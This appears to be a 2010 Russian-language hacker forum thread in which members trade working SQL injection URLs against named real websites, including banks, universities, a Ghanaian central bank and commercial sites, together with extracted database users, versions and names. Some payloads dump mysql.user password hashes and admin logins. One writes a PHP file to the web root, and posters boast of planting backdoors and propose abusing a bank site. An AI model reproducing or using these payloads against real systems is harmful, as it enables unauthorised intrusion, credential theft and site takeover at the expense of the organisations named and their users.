SQL Инъекции

b82a · 18 Apr 2010

Code:
http://www.analisi.ru/info.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4%20--+
User: analisi@localhost
Database: analisi
Version: 5.0.45

av1 · 18 Apr 2010

Code:
http://www.shadowlocked.com/news2/news_shadowlocked.php?ID=-75+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14--&CAT=FILM
User: slnewsuser@localhost
Version: 5.0.45
Database: slnews

Google PR: 5
Code:
http://www.snseurope.com/snslink/news/news-full.php?id=-13519+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
User: [email protected]
Version: 5.0.77
Database: eurohs

Google PR: 4
Code:
http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13--
User: [email protected]
Version: 5.0.45
Database: SNIA

Google PR: 7
Code:
http://www.gamesonlinepro.com/full.php?id=6557+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4--
User: [email protected]
Version: 5.0.45-log
Database: gamesonlinepro

Данные можно увидеть через исходный код...

b82a · 18 Apr 2010

Code:

http://www.thaiware.com/main/info.php?id=-999%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20--+

PR: 6
User: 4ever@localhost
Database: thaiware
Version: 4.1.22

Code:

http://www.bmprocess.ru/equipment/spb?info&id=-100%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4%20--+

User: [email protected]
Database: u39424_bmp
Version: 5.0.67-log

v1d0qz · 18 Apr 2010

Если кому интересно, большинство сайтов тицастые и пиаристые.

---1---
http://www.ogirk.ru/news/2010-04-12/-golos'+union+select+1,2,concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--+.html
кабинет присутствует.

---2 : сайт какой-то фирмы---
http://perfectseo.ru/linker/reception_title.php?c=1'+or(1,1)=(select+count(*),concat((select+concat_ws(0x3a,email,password,name,user_group)+from+dimigo_users+LIMIT+0,1),floor(rand(0)*2))from(information_schema.tables)+GROUP+BY+2)--+
Нашел эту фирму по оставленому от них бекдору. Естественно их я удалил, багу закрыл, своё залил.

---3---

http://www.sosedi.perm.ru/rubriks.php?n=-1'+union+select+1,group_concat(version(),0x3a,user(),0x3a,database())--+
5.0.51a-log
alphaoboz_sosed@localhost
alphaoboz_sosed

---4---

http://ad-auto.ru/detail.php?siteid=-16186+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74+from+information_schema.columns+where+table_name='user'
Вывод в титле, кто не заметил.

---5---

http://olympicgames.com.ua/archive.phtml?id_rubric=-229+union+select+group_concat(version(),0x3a,user(),0x3a,database())--+
5.0.45-log
[email protected]
olympicgames

---6---

http://www.audit.by/new/?news_id=-487+union+select+1,2,3,4,5,group_concat(version(),0x3a,user(),0x3a,database()),7--+
4.0.24_Debian-10sarge2-log
auditby2@localhost
auditby2

---7---

http://biz.podolsk.ru/rate.php?id=1+union+select+group_concat(version(),0x3a,user(),0x3a,database())
5.1.40
bizadmin@localhost
bizadmin

---8---

http://carlson.ru/aerography.php?service=-469'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(table_name,0x3a,column_name),16,17,18,19,20,21,22,23+from+information_schema.columns+where+column_name+like+'%pass%'--+

---9---

http://www.ulif.mon.gov.ua/ulif/?mov=runnew&id_run=-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename+from+pg_user+where+usename=user+and+usesuper=$$true$$--

---10---

http://www.russ-tur.ru/transit-tours/-35125%27+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(version(),0x3a,user(),0x3a,database()),12,13--+.html
5.0.67
[email protected]
b11295_2

---11---

http://www.e3e5.com/articles.php?lang=0&section=14+and+1=cast%28%28SELECT+version%28%29||chr%2858%29||user||chr%2858%29||current_database%28%29+from+information_schema.columns+limit+1+offset+0%29+as+int%29

---12---

http://www.dorogajizni.ru/?action=show&id=12762+and+1=cast%28%28SELECT+version%28%29||chr%2858%29||user||chr%2858%29||current_database%28%29+from+information_schema.columns+limit+1+offset+0%29+as+int%29

---13 : банк 400 тиц---

http://www.econombank.ru/banner/nsclick.php?id=1+or+%281,1%29=%28select+count%280%29,concat%28version%28%29,floor%28rand%280%29*2%29%29from%28st_banner_shows%29GROUP+BY+2%29--+

---14---

http://www.obyava.ru/index.php?settown=%C2%F1%E5+%F0%E5%E3%E8%EE%ED%FB%27+union+select+1,group_concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12--+
5.0.41-log
obyava@localhost
auto

---15---

Можно заливать через двойной запрос.
http://www.richtime.ru/?select=catalogue&model_id=-00014722+union+select+1,2,3,4,5,0x35372720756e696f6e2073656c656374203120696e746f206f757466696c65202f7661722f7777772f6874646f63732f616e7469636861742e72752f746573742e70687027202d2d20,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user

---16---

http://www.kiteworld.ru/kitelist.php?Id=1&MultiId=-1+union+select+version()--+
4.1.25-log
[email protected]
wwwkiteworldru

---17 : 1400 тиц---

http://www.etver.ru/job/index.php?go=vacancy&action=detail&id=-4364+union+select+1,2,3,4,5,group_concat%28table_name,0x3a,column_name%29,7,8,9,10,11+from+information_schema.columns+where+column_name+like+0x257061737325--+

---18 : подарок для наркоманов, проституток и кардеров---

https://www.rivercitybankonline.com/event_page.php?evt_id=mxzxpurjn&mode=r&poll_id=-14+union+select+1,2,group_concat(user,0x3a,password,0x3a,file_priv,0x3a,host)+from+mysql.user--+

---19 : едушка---

http://www.augustana.edu/prebuilt/acal/event.php?mode=js&eventid=1+union+select+1,group_concat(user,0x3a,password,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--+

---20 : сами знаете для кого)---

Вроде центральный банк Ганы, вроде есть админка и пользователи. Pr 6, можно загнать пару доров, траст как-бы есть , а можно что-то другое сделать
http://www.bog.gov.gh/index1.php?linkid=65&archiveid=1452+and+1=0+union+select+group_concat(table_name,0x3a,column_name),222+from+information_schema.columns+where+column_name+like+0x257061737325--+&page=1&adate=23%2F03%2F2010

---21---

http://events.plu.edu/show-event.php?event_id=1039695+union+select+1,group_concat(user,0x3a,password,0x3a,file_priv,0x3a,host),3,4+from+mysql.user--+

---22 : загнал функцию---

http://www.muztorg.ua/catalog/?id=-1+union+select+%28proxywork%28$$func$$%29::text%29+from+pg_user+LIMIT+1+OFFSET+0--
user - muztorg.attrade bd - ua.attrade version - PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)

---23---

Пароли вроде как подходят.
http://nano.stanford.edu/model.php?id=-23+union+select+1,2,3,group_concat%28name,0x3a,username,0x3a,password,0x3a,access_levels%29,5,6,7,8,9,10+from+manage_admins+where+access_levels=0x416c6c--+

---24---

view-source:http://www.gretta.ru/?part=item&cat=1&iid=-1%27+union+select+111,222,333,444,group_concat%28login,0x3a,pass%29+from+admin--+

---25 : Игра---

Так
http://download.beyondunreal.com/browse.php?cat=5%27+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+column_name+LIKE+%27%password%%27+LIMIT+1,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)--+
или так
view-source:http://download.beyondunreal.com/browse.php?cat=5'+and+1=0+union+select+111,222,333,concat_ws(version(),0x3a,database(),0x3a,user()),555,666+from+--+

Красивый у них mail...
http://mail.beyondunreal.com/

5.0.51b-log
fusion
fusion@ginger

---26---

http://www.tvdata.ru/allpartners.php?id=-12+union+select+1,concat_ws(0x3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12+from+mysql.user--

(с)v1d0q

Дирижабль · 18 Apr 2010

Code:

http://www.gigantiaclan.at/index/index.php?site=files&cat=-5%27+OR+1=1/*

MySQL Version: 5.1.41

Konqi · 18 Apr 2010

http://www.ikwilhelpen.be/iwh/action.php?aid=-1048+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),version(),database(),@@version_compile_os),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97+from+user--

так мало колонок никогда не видал =)

SEWERN · 18 Apr 2010

Code:
http://www.vintagevirginiaapples.com/Shop_Show_product.php?Product_Id=248+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.22
Database name: apples
User name: apples@localhost

DavanG3 · 19 Apr 2010

Code:

http://www.bkik.hu/euinfo/showprojects.php?nid=22+union+all+sele  ct+1,2, 3,4--

Version : MysqL 4.1

Keltos · 19 Apr 2010

Code:

http://www.search.uz/review.php?sid=-317104+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a%20,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38

User: searchu_se@localhost
Version: 5.0.85-community
Database: searchu_se

Gorev · 19 Apr 2010

http://www.shoppingcenter.ru/catalog/index_category.php?categoryId=6+UNION+SELECT+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--%20&parentId=0&begin=0

Database Version: 5.0.77
Database name: arhicom_sc
User name: arhicom_sc.shopp@localhost
Os : Linux

Keltos · 19 Apr 2010

Code:
http://www.uh.edu/news-events/newsrelease.php?releaseid_int=-239+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3,4,5,6,7,8--
User: [email protected]
Version: 4.1.16standard-log
Database: uhnews

Google PR: 7

av1 · 19 Apr 2010

Code:
http://www.aaaahotels.com/detail.php?id=-535+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
User: aaaahotels@localhost
Version: 5.0.32-Debian_7etch11-log
Database: aaaahotels_com

Google PR: 5
Code:
http://www.evergreenrecreation.com/facilities.php?id=-10+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7,8,9,10,11,12--
User: [email protected]
Version: 5.0.51a-24+lenny1
Database: db49768_eprd

Google PR: 4
Code:
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,12,13--
User: eamesgal@localhost
Version: 4.0.27-standard
Database: eamesgal_eostore

Google PR: 6
Code:
http://encycl.anthropology.ru/article.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,10--
User: anthropo_visitor@localhost
Version: 5.0.90-community-log
Database: anthropo_encycl

Google PR: 5
Code:
http://www.fondsk.ru/article.php?id=-1529+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Мб повторяюсь...!
User: [email protected]
Version: 5.0.67-log
Database: u32888

Google PR: 5
Code:
http://www.stots.edu/article.php?id=-25+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8--
User: pe@localhost
Version: 4.1.22-standard
Database: stots_pe

Google PR: 6

warlok · 20 Apr 2010

продолжение этого поста:
Code:
http://uasc.org.ua/2010/04/знімаємо-капелюха-redhat-sql-inj/comment-page-1/#comment-504
Code:
http://www.es.redhat.com/news/article/3027+and+5=4+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13.html
user(): www@localhost
version(): 5.0.77-log
database(): redhateurope

AC//DC · 20 Apr 2010

для любителей анимэ
Code:
http://www.ranmaspb.ru/?t=news&sm=newsarhiv&nsid=-178/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),7--
version:5.0.90
user:[email protected]
database:ranmaspbru
os : portbld-freebsd8.0

форум рабочий

street16 · 20 Apr 2010

HTML:

http://www.santech.ru/katalog/cards.php3?gid=-2%20uni on%20select%201,ve rsion()/*

4.0.27-log

total90 · 20 Apr 2010

radioplovdiv.bg
Code:
http://www.radioplovdiv.bg/index2.php?content=interview&id=-289+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--
User:radiopd_radio@localhost
Database:radiopd_rrs
Version:5.0.85-community-log
PR5

DavanG3 · 21 Apr 2010

Code:
http://www.e-chari.net/index.php?page=fiche&id=-24 union all select 1,concat_ws(0x3a,user(),database(),ver  sion()),3,4,5, 6,7,8,9,10,11,12,13--
User : [email protected]
Database : echarinet
Version : 5.0.84-log
Code:
http://www.chamberofcommerce.org.lr/getcompanyinfo.php?id=-205 union select 1,concat_ws(0x3a,user(),datab  ase(),version()),3,4,5,6,7, 8,9--
User : [email protected]
Database : chamberofcom
Version : 5.0.77
Code:
http://marketliberia.com/directory/getcompanyinfo.php?id=3&cat_id=-24 union select 1,con  cat_ws(0x3a,user(),dat  abase(),version()),3--
User : mojgovlr_market@localhost
Database : mojgovlr_marketliberia
Version : 5.1.45-log
Code:
http://www.agpgabon.ga/show_article.php?IDActu=-7250 union select 1,concat_ws(0x3a,user(),datab  ase(),version()),3,4,5,6,7,8,9,10,11,12,1  3,14,15,16,17,  18,19,20,21,22,23,24,25--
User : tzue@localhost
Database :agpgabon
Version : 5.1.45-0.dotdeb.0-log
Code:
http://www.mfrchallans.fr/actualite.php?idactu=39 union select 1,2,concat_ws(0x3a,user(),databa  se(),version()),4,5,6,  7,8,9,10,11,12,13--
User : [email protected]
Database :mfrchallansfr
Version : 5.0.51a-3ubuntu5.4-log
Code:
http://www.protomed.fr/en/popup_actu.php?idactu=-41 union select 1,concat_ws(0x3a,datab ase(),user(),ve  rsion()),3,4,5,6--
User : protomed@localhost:5.0.32
Database : protomed_biome
Version : Debian_7etch8-log

Ctacok · 21 Apr 2010

http://mp3hungama.com/music/genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

AC//DC · 21 Apr 2010

Code:

http://www.bestline.ru/index.html?get=catalogue&section=-2650+union+all+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71)--&_sid=a532ac911c929be8407efd60bab3e0d3#2650

version: 4.1.25-log
user: bestline@localhost
database: wwwbestlineru
os : portbld-freebsd6.2

CyberHunter · 21 Apr 2010

Code:
http://kvazar-ufa.ru/page.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
User: kvazar@localhost
Version: 5.0.77
Database: kvazar

SQL Инъекции

b82a Elder - Старейшина

av1 Elder - Старейшина

b82a Elder - Старейшина

v1d0qz Elder - Старейшина

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

Konqi Green member

SEWERN Elder - Старейшина

DavanG3 New Member

Keltos Banned

Gorev Level 8

Keltos Banned

av1 Elder - Старейшина

warlok Elder - Старейшина

AC//DC Active Member

street16 Elder - Старейшина

total90 Elder - Старейшина

DavanG3 New Member

Ctacok Banned

AC//DC Active Member

CyberHunter Active Member

Useful Searches

SQL Инъекции

b82a Elder - Старейшина

av1 Elder - Старейшина

b82a Elder - Старейшина

v1d0qz Elder - Старейшина

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

Konqi Green member

SEWERN Elder - Старейшина

DavanG3 New Member

Keltos Banned

Gorev Level 8

Keltos Banned

av1 Elder - Старейшина

warlok Elder - Старейшина

AC//DC Active Member

street16 Elder - Старейшина

total90 Elder - Старейшина

DavanG3 New Member

Ctacok Banned

AC//DC Active Member

CyberHunter Active Member